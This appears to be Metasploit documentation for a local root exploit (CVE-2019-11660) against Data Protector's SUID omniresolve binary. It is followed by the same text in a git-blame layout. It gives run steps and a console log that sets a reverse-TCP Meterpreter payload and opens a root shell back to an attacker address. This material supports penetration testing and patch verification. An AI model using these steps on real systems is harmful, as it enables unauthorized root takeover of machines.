documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md

## Description

  This module exploits the trusted `$PATH` environment
  variable of the SUID binary `omniresolve` in
  Micro Focus (HPE) Data Protector A.10.40 and prior.

  The `omniresolve` executable calls the `oracleasm` binary using
  a relative path and the trusted `$PATH`, which allows an attacker
  to execute a custom binary with `root` privileges.


## Vulnerable Application

  This module has been successfully tested on:

  * HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110
  * Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118 on CentOS Linux release 7.6.1810 (Core)

  The vulnerability has been patched in:
  * Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/omniresolve_suid_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SUID_PATH**

  Path to `omniresolve` executable (default: `/opt/omni/lbin/omniresolve`)

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenario

### DP 10.40 build 118 on CentOS Linux release 7.6.1810 (Core)

  ```
  msf5 > use exploit/linux/local/omniresolve_suid_priv_esc
  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check
  [+] The target is vulnerable.
  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/komniresolve_suid_priv_esc) > set lhost 192.168.0.113
  lhost => 192.168.0.113
  msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run
  
  [*] Started reverse TCP handler on 192.168.0.113:4444 
  [*] Sending stage (3021284 bytes) to 192.168.0.107
  [*] Meterpreter session 2 opened (192.168.0.113:4444 -> 192.168.0.107:54510) at 2019-10-01 13:19:45 -0400
  [+] Deleted /tmp/oracleasm
  [+] Deleted /tmp/gprjmiMGOr
  
  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 192.168.0.107
  OS           : CentOS 7.6.1810 (Linux 3.10.0-957.21.2.el7.x86_64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```
Add omniresolve priv escalation module (CVE-2019-11660) 2019-10-01 15:03:29 -04:00			`## Description`

Update documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md 2019-10-02 11:42:44 +03:00			This module exploits the trusted `$PATH` environment
Add omniresolve priv escalation module (CVE-2019-11660) 2019-10-01 15:03:29 -04:00			variable of the SUID binary `omniresolve` in
			`Micro Focus (HPE) Data Protector A.10.40 and prior.`

			The `omniresolve` executable calls the `oracleasm` binary using
Update documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md 2019-10-02 11:43:28 +03:00			a relative path and the trusted `$PATH`, which allows an attacker
Add omniresolve priv escalation module (CVE-2019-11660) 2019-10-01 15:03:29 -04:00			to execute a custom binary with `root` privileges.


			`## Vulnerable Application`

			`This module has been successfully tested on:`

			`* HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110`
			`* Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118 on CentOS Linux release 7.6.1810 (Core)`

			`The vulnerability has been patched in:`
			`* Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125`


			`## Verification Steps`

			1. Start `msfconsole`
			`2. Get a session`
			3. `use exploit/linux/local/omniresolve_suid_priv_esc`
			4. `set SESSION [SESSION]`
			5. `check`
			6. `run`
			`7. You should get a new root session`


			`## Options`

			`SUID_PATH`

			Path to `omniresolve` executable (default: `/opt/omni/lbin/omniresolve`)

			`WritableDir`

			A writable directory file system path. (default: `/tmp`)


			`## Scenario`

			`### DP 10.40 build 118 on CentOS Linux release 7.6.1810 (Core)`

			```
			`msf5 > use exploit/linux/local/omniresolve_suid_priv_esc`
			`msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set session 1`
			`session => 1`
			`msf5 exploit(linux/local/omniresolve_suid_priv_esc) > check`
			`[+] The target is vulnerable.`
			`msf5 exploit(linux/local/omniresolve_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp`
			`payload => linux/x64/meterpreter/reverse_tcp`
			`msf5 exploit(linux/local/komniresolve_suid_priv_esc) > set lhost 192.168.0.113`
			`lhost => 192.168.0.113`
			`msf5 exploit(linux/local/omniresolve_suid_priv_esc) > run`

			`[*] Started reverse TCP handler on 192.168.0.113:4444`
			`[*] Sending stage (3021284 bytes) to 192.168.0.107`
			`[*] Meterpreter session 2 opened (192.168.0.113:4444 -> 192.168.0.107:54510) at 2019-10-01 13:19:45 -0400`
			`[+] Deleted /tmp/oracleasm`
			`[+] Deleted /tmp/gprjmiMGOr`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 192.168.0.107`
			`OS : CentOS 7.6.1810 (Linux 3.10.0-957.21.2.el7.x86_64)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter >`
Update documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md 2019-10-02 11:42:44 +03:00			```